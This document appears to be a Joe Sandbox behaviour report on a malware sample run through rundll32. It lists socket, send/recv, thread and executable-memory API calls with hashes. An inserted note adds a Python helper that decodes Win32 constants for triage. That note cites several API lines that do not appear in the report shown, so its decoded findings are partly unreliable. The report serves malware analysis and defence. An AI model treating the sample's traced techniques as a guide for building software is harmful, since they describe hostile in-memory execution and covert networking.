                              Similarity
                              • API ID: Heap$AllocateFreememmove
                              • String ID:
                              • API String ID: 94897913-0
                              • Opcode ID: 760e99beb83d4a1e3f8fd0f9d49ecd2fdd633788b5b5ebd09bae2d8beaa2ef2d
                              • Instruction ID: 72b82fd31208fe839d82664adfda14ad7695adf9f0076e0b8fbcf7d1acd673e9
                              • Opcode Fuzzy Hash: 760e99beb83d4a1e3f8fd0f9d49ecd2fdd633788b5b5ebd09bae2d8beaa2ef2d
                              • Instruction Fuzzy Hash: 46014471704204AFDB159F6ACC84E6FBFBAEF86258F058039F94AC3201E7325519C666
                              APIs
                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04DB9D54
                              • GdipDisposeImage.GDIPLUS(?), ref: 04DB9D68
                              • GdipDisposeImage.GDIPLUS(?), ref: 04DB9D8B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                              • String ID:
                              • API String ID: 800915452-0
                              • Opcode ID: 640793cb6a025a27e7128918f7fc80997f84d28241fd7bd6d9d57293b71c33f5
                              • Instruction ID: 4f85e120443b873db51b028adcd61fdff5c01d36b0662f24f513b7c01e2799af
                              • Opcode Fuzzy Hash: 640793cb6a025a27e7128918f7fc80997f84d28241fd7bd6d9d57293b71c33f5
                              • Instruction Fuzzy Hash: E1F044B1901229E78F10EF94D8548EEF778FB45715B00459EED46A7340D634AE15CBE1
                              APIs
                              • EnterCriticalSection.KERNEL32(04DDFB64), ref: 04DB9A3C
                              • GdiplusStartup.GDIPLUS(04DDFB60,?,?), ref: 04DB9A75
                              • LeaveCriticalSection.KERNEL32(04DDFB64), ref: 04DB9A86
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterGdiplusLeaveStartup
                              • String ID:
                              • API String ID: 389129658-0
                              • Opcode ID: 32364f53bbec542dfa46894e0da8eaf05fc9fad271b2d22dc5b4bd6ef4a023e1
                              • Instruction ID: 96379296e4eb6ce866a9b35a0a59e775907476cf2c2a2ab7c439cee83bdfaa60
                              • Opcode Fuzzy Hash: 32364f53bbec542dfa46894e0da8eaf05fc9fad271b2d22dc5b4bd6ef4a023e1
                              • Instruction Fuzzy Hash: CCF0F671982209DFCB009F91E8797EA7BB8FB04301F40018DE54646240C7B62548CFE1
                              APIs
                              • __getptd_noexit.LIBCMT ref: 0420731B
                                • Part of subcall function 042099BA: GetLastError.KERNEL32(?,7FFFFFFF,042072D2,0420AF17,00000010,?,?,?,?,?,?,0420AF67,?,?,AC6D425D,00000000), ref: 042099BE
                                • Part of subcall function 042099BA: ___set_flsgetvalue.LIBCMT ref: 042099CC
                                • Part of subcall function 042099BA: __calloc_crt.LIBCMT ref: 042099E0
                                • Part of subcall function 042099BA: DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,0420AF67,?,?,AC6D425D,00000000,?,0420772F,?,00000000), ref: 042099FA
                                • Part of subcall function 042099BA: GetCurrentThreadId.KERNEL32 ref: 04209A10
                                • Part of subcall function 042099BA: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,0420AF67,?,?,AC6D425D,00000000,?,0420772F,?,00000000), ref: 04209A28
                              • __freeptd.LIBCMT ref: 04207325
                                • Part of subcall function 04209B7C: TlsGetValue.KERNEL32(?,?,0420732A,00000000,?,04207356,00000000), ref: 04209B9D
                                • Part of subcall function 04209B7C: TlsGetValue.KERNEL32(?,?,0420732A,00000000,?,04207356,00000000), ref: 04209BAF
                                • Part of subcall function 04209B7C: DecodePointer.KERNEL32(00000000,?,0420732A,00000000,?,04207356,00000000), ref: 04209BC5
                                • Part of subcall function 04209B7C: __freefls@4.LIBCMT ref: 04209BD0
                                • Part of subcall function 04209B7C: TlsSetValue.KERNEL32(0000001C,00000000,?,0420732A,00000000,?,04207356,00000000), ref: 04209BE2
                              • ExitThread.KERNEL32 ref: 0420732E
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                              • String ID:
                              • API String ID: 4224061863-0
                              • Opcode ID: bb1d523a28579ee5e7d7efc6d0f7160f808ff53c430e52f9fdba2313a097b6af
                              • Instruction ID: 8478592c6d64fe060bf451543bb5cfd9a76ab928474380d7789a00b7749394f2
                              • Opcode Fuzzy Hash: bb1d523a28579ee5e7d7efc6d0f7160f808ff53c430e52f9fdba2313a097b6af
                              • Instruction Fuzzy Hash: B6C08CB02102082AAB003725980C90BBAEDDA90214B848020680A820A3EE68F8818090
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0466022B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                              • Instruction ID: b7805215d0da00f6fa347e7edf0b2dfe7ef76fe2f27cd713c138538182bd8468
                              • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                              • Instruction Fuzzy Hash: BDA13971A00606EFDB24CFA9C880AAEB7B5FF48705B148179E416EB751E770FA51CB90
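Added note and helper (not part of the Joe Sandbox report, not code from the sample): the hex arguments in the API lines above are raw Win32 values, and decoding them is what turns these listings into findings. The WSASocketW, ioctlsocket and setsockopt entries at refs 6CBEB6BC, 6CBEB6DA and 6CC584BE resolve to AF_INET/SOCK_STREAM/IPPROTO_TCP with WSA_FLAG_OVERLAPPED|WSA_FLAG_NO_HANDLE_INHERIT, FIONBIO (non-blocking socket) and TCP_NODELAY, which is an outbound TCP client consistent with the Tokio runtime strings in the same image. The VirtualAlloc at ref 0466022B requests MEM_COMMIT with PAGE_EXECUTE_READWRITE in a region the report marks "based on PE: false", while the allocations in the 04DB0000 and 04200000 regions use PAGE_READWRITE. The Python below parses API lines in the format rendered on this page and applies those constant tables. Assumptions: the line layout and the `?` placeholder (an argument the sandbox did not recover) are taken from how this report renders; the constant values are the documented Win32/Winsock ones; the sample lines are copied from the blocks above.

```python
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Union

# Documented Win32 / Winsock constant values used to decode hex arguments.
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
IPPROTO = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
WSA_FLAGS = {0x01: "WSA_FLAG_OVERLAPPED", 0x80: "WSA_FLAG_NO_HANDLE_INHERIT"}
TCP_OPTS = {1: "TCP_NODELAY"}
IOCTLS = {0x8004667E: "FIONBIO", 0x4004667F: "FIONREAD"}
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
FREE_TYPE = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

Arg = Union[int, str]
Decoder = Callable[[int, List[Arg]], str]

# Assumed report layout: "[Part of subcall function X: ]Api.MODULE(args), ref: ADDR"
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>[\w@]+)\.(?P<module>[\w.\-]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    ref: str
    subcall: Optional[str]
    args: List[Arg]
    decoded: Dict[int, str] = field(default_factory=dict)  # arg index -> symbolic name

def _enum(table: Dict[int, str]) -> Decoder:
    return lambda v, _args: table.get(v, hex(v))

def _flags(table: Dict[int, str]) -> Decoder:
    def decode(v: int, _args: List[Arg]) -> str:
        names = [name for bit, name in table.items() if v & bit]
        leftover = v & ~sum(table)          # bits not covered by the table
        if leftover:
            names.append(hex(leftover))
        return "|".join(names) if names else hex(v)
    return decode

def _sockopt_name(v: int, args: List[Arg]) -> str:
    # optname is only meaningful relative to the level argument (args[1]).
    return TCP_OPTS.get(v, hex(v)) if len(args) > 1 and args[1] == 6 else hex(v)

# Per-API decoders keyed by zero-based argument position.
RULES: Dict[str, Dict[int, Decoder]] = {
    "WSASocketW":   {0: _enum(AF), 1: _enum(SOCK_TYPE), 2: _enum(IPPROTO), 5: _flags(WSA_FLAGS)},
    "setsockopt":   {1: _enum(IPPROTO), 2: _sockopt_name},
    "ioctlsocket":  {1: _enum(IOCTLS)},
    "VirtualAlloc": {2: _flags(ALLOC_TYPE), 3: _enum(PAGE_PROT)},
    "VirtualFree":  {2: _flags(FREE_TYPE)},
}

def _parse_arg(token: str) -> Arg:
    token = token.strip()
    # 8-digit hex is a concrete value; "?" and inline string arguments stay verbatim.
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", token) else token

def annotate(line: str) -> Optional[ApiCall]:
    """Parse one report API line; returns None for lines that do not match."""
    m = LINE_RE.match(line.strip().lstrip("•").strip())
    if not m:
        return None
    raw = m.group("args")
    args = [_parse_arg(t) for t in raw.split(",")] if raw else []
    call = ApiCall(m.group("api"), m.group("module"), m.group("ref"), m.group("sub"), args)
    for idx, decoder in RULES.get(call.api, {}).items():
        if idx < len(args) and isinstance(args[idx], int):
            call.decoded[idx] = decoder(args[idx], args)
    return call

def describe(call: ApiCall) -> str:
    shown = [call.decoded.get(i, a if isinstance(a, str) else f"{a:08X}")
             for i, a in enumerate(call.args)]
    return f"{call.api}({', '.join(shown)}) @ {call.ref}"

def rwx_allocations(calls: List[ApiCall]) -> List[str]:
    # Triage: VirtualAlloc with PAGE_EXECUTE_READWRITE is the usual precursor to
    # writing and running code in private memory.
    return [c.ref for c in calls
            if c.api == "VirtualAlloc" and c.decoded.get(3) == "PAGE_EXECUTE_READWRITE"]

# Lines copied from the report blocks above (the bullet is part of the page text).
SAMPLE_LINES = [
    "• Part of subcall function 6CBEB679: WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000081), ref: 6CBEB6BC",
    "• Part of subcall function 6CBEB679: ioctlsocket.WS2_32(?,8004667E,?), ref: 6CBEB6DA",
    "• setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 6CC584BE",
    "• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04DB1226",
    "• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04DB1255",
    "• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0466022B",
    "• GetCurrentThreadId.KERNEL32 ref: 04DB316B",
]

if __name__ == "__main__":
    calls = [c for c in map(annotate, SAMPLE_LINES) if c]
    for c in calls:
        print(describe(c))
    print("RWX allocations at:", rwx_allocations(calls))
```

Only positional decodes are attempted, so a string argument that contains commas (as in the memmove entry at ref 6CBF5916) is split into extra tokens that are simply left undecoded; extend RULES with further APIs and tables as needed for the rest of the listing.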
                              APIs
                              • timeGetTime.WINMM(04DB30C5,?,?), ref: 04DB3413
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Timetime
                              • String ID:
                              • API String ID: 17336451-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastsend
                              • String ID:
                              • API String ID: 1802528911-0
                              APIs
                              • GetQueuedCompletionStatusEx.KERNEL32(?,?,?,?,-00000001,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CBF5AB6
                              • GetLastError.KERNEL32(?,-00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,6CC58A83,?), ref: 6CBF5AD1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: CompletionErrorLastQueuedStatus
                              • String ID:
                              • API String ID: 1532515109-0
                              APIs
                                • Part of subcall function 6CC50110: RtlAllocateHeap.NTDLL(02870000,00000000,?,?,6CBC5AAF,?,00000004,6CBCE4B2,?,6CC4682F,?,?,?,?,6CC465EB,00000002), ref: 6CC5011F
                              • CreateThread.KERNEL32(00000000,?,6CC4FBE0,00000000,00010000,00000000), ref: 6CC4FAF8
                              • GetLastError.KERNEL32(?,?,?), ref: 6CC4FB54
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AllocateCreateErrorHeapLastThread
                              • String ID:
                              • API String ID: 3346699961-0
                              APIs
                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 04203023
                              • recv.WS2_32(?,?,00040000,00000000), ref: 04203044
                                • Part of subcall function 042072CD: __getptd_noexit.LIBCMT ref: 042072CD
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: __getptd_noexitrecvselect
                              • String ID:
                              • API String ID: 4248608111-0
                              APIs
                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 04DB3043
                              • recv.WS2_32(?,?,00040000,00000000), ref: 04DB3064
                                • Part of subcall function 04DBF87B: __getptd_noexit.LIBCMT ref: 04DBF87B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: __getptd_noexitrecvselect
                              • String ID:
                              • API String ID: 4248608111-0
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6CC4FD60
                              • SetThreadDescription.KERNELBASE(00000000,?), ref: 6CC4FD6E
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: Thread$CurrentDescription
                              • String ID:
                              • API String ID: 654298328-0
                              APIs
                              • memset.VCRUNTIME140(?,00000000,00000190), ref: 6CC4F9DA
                              • WSAStartup.WS2_32(00000202,?), ref: 6CC4F9E8
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: Startupmemset
                              • String ID:
                              • API String ID: 1873301828-0
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000140), ref: 6CBF9ECC
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: main
                              • API String ID: 2162964266-3207122276
                              APIs
                              • send.WS2_32(?,?,00040000,00000000), ref: 04DB3291
                              • send.WS2_32(?,?,?,00000000), ref: 04DB32CE
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: send
                              • String ID:
                              • API String ID: 2809346765-0
                              APIs
                              • send.WS2_32(?,?,00040000,00000000), ref: 04203271
                              • send.WS2_32(?,?,?,00000000), ref: 042032AE
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: send
                              • String ID:
                              • API String ID: 2809346765-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: SleepTimetime
                              • String ID:
                              • API String ID: 346578373-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: SleepTimetime
                              • String ID:
                              • API String ID: 346578373-0
                              APIs
                              • HeapCreate.KERNEL32(00000004,00000000,00000000,04DBDFAE,00000000,04DB9760,?,?,?,00000000,04DD125B,000000FF,?,04DBDFAE), ref: 04DBCC9B
                              • _free.LIBCMT ref: 04DBCCD6
                                • Part of subcall function 04DB1280: __CxxThrowException@8.LIBCMT ref: 04DB1290
                                • Part of subcall function 04DB1280: DeleteCriticalSection.KERNEL32(00000000,04DBD341,04DD6624,?,?,04DBD341,?,?,?,?,04DD5A40,00000000), ref: 04DB12A1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                              • String ID:
                              • API String ID: 1116298128-0
                              APIs
                              • HeapCreate.KERNEL32(00000004,00000000,00000000,042061A0,00000000,04205B02), ref: 042065EB
                              • _free.LIBCMT ref: 04206626
                                • Part of subcall function 04201280: __CxxThrowException@8.LIBCMT ref: 04201290
                                • Part of subcall function 04201280: DeleteCriticalSection.KERNEL32(00000000,FFFFFFFF,04217E78,?,?,04206601), ref: 042012A1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                              • String ID:
                              • API String ID: 1116298128-0
                              APIs
                              • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 6CC584BE
                              • WSAGetLastError.WS2_32(?,00000004,?,?,00000002,6CC0288D,?,?,6CCB5F8C,6CCB5F64), ref: 6CC584CB
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastsetsockopt
                              • String ID:
                              • API String ID: 1729277954-0
                              APIs
                              • CreateThread.KERNEL32(00000000,00000000,04DBDE70,00000000,00000000,00000000), ref: 04DBE3FB
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,04DC10C8,?,?,?,?,?,?,04DD6298,0000000C,04DC1170,?), ref: 04DBE409
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateObjectSingleThreadWait
                              • String ID:
                              • API String ID: 1891408510-0
                              APIs
                              • __getptd.LIBCMT ref: 04DBF8EF
                                • Part of subcall function 04DC3E41: __getptd_noexit.LIBCMT ref: 04DC3E44
                                • Part of subcall function 04DC3E41: __amsg_exit.LIBCMT ref: 04DC3E51
                                • Part of subcall function 04DBF8C4: __getptd_noexit.LIBCMT ref: 04DBF8C9
                                • Part of subcall function 04DBF8C4: __freeptd.LIBCMT ref: 04DBF8D3
                                • Part of subcall function 04DBF8C4: ExitThread.KERNEL32 ref: 04DBF8DC
                              • __XcptFilter.LIBCMT ref: 04DBF910
                                • Part of subcall function 04DC4173: __getptd_noexit.LIBCMT ref: 04DC4179
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                              • String ID:
                              • API String ID: 418257734-0
                              APIs
                              • __getptd.LIBCMT ref: 04207341
                                • Part of subcall function 04209A33: __getptd_noexit.LIBCMT ref: 04209A36
                                • Part of subcall function 04209A33: __amsg_exit.LIBCMT ref: 04209A43
                                • Part of subcall function 04207316: __getptd_noexit.LIBCMT ref: 0420731B
                                • Part of subcall function 04207316: __freeptd.LIBCMT ref: 04207325
                                • Part of subcall function 04207316: ExitThread.KERNEL32 ref: 0420732E
                              • __XcptFilter.LIBCMT ref: 04207362
                                • Part of subcall function 04209D65: __getptd_noexit.LIBCMT ref: 04209D6B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                              • String ID:
                              • API String ID: 418257734-0
                              APIs
                              • __lock.LIBCMT ref: 04DC648E
                                • Part of subcall function 04DC8E5B: __mtinitlocknum.LIBCMT ref: 04DC8E71
                                • Part of subcall function 04DC8E5B: __amsg_exit.LIBCMT ref: 04DC8E7D
                                • Part of subcall function 04DC8E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,04DC3EEC,0000000D,04DD6340,00000008,04DC3FE3,00000000,?,04DC1050,00000000,04DD6278,00000008,04DC10B5,?), ref: 04DC8E85
                              • __tzset_nolock.LIBCMT ref: 04DC649F
                                • Part of subcall function 04DC5D95: __lock.LIBCMT ref: 04DC5DB7
                                • Part of subcall function 04DC5D95: ____lc_codepage_func.LIBCMT ref: 04DC5DFE
                                • Part of subcall function 04DC5D95: __getenv_helper_nolock.LIBCMT ref: 04DC5E20
                                • Part of subcall function 04DC5D95: _free.LIBCMT ref: 04DC5E57
                                • Part of subcall function 04DC5D95: _strlen.LIBCMT ref: 04DC5E5E
                                • Part of subcall function 04DC5D95: __malloc_crt.LIBCMT ref: 04DC5E65
                                • Part of subcall function 04DC5D95: _strlen.LIBCMT ref: 04DC5E7B
                                • Part of subcall function 04DC5D95: _strcpy_s.LIBCMT ref: 04DC5E89
                                • Part of subcall function 04DC5D95: __invoke_watson.LIBCMT ref: 04DC5E9E
                                • Part of subcall function 04DC5D95: _free.LIBCMT ref: 04DC5EAD
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                              • String ID:
                              • API String ID: 1828324828-0
                              APIs
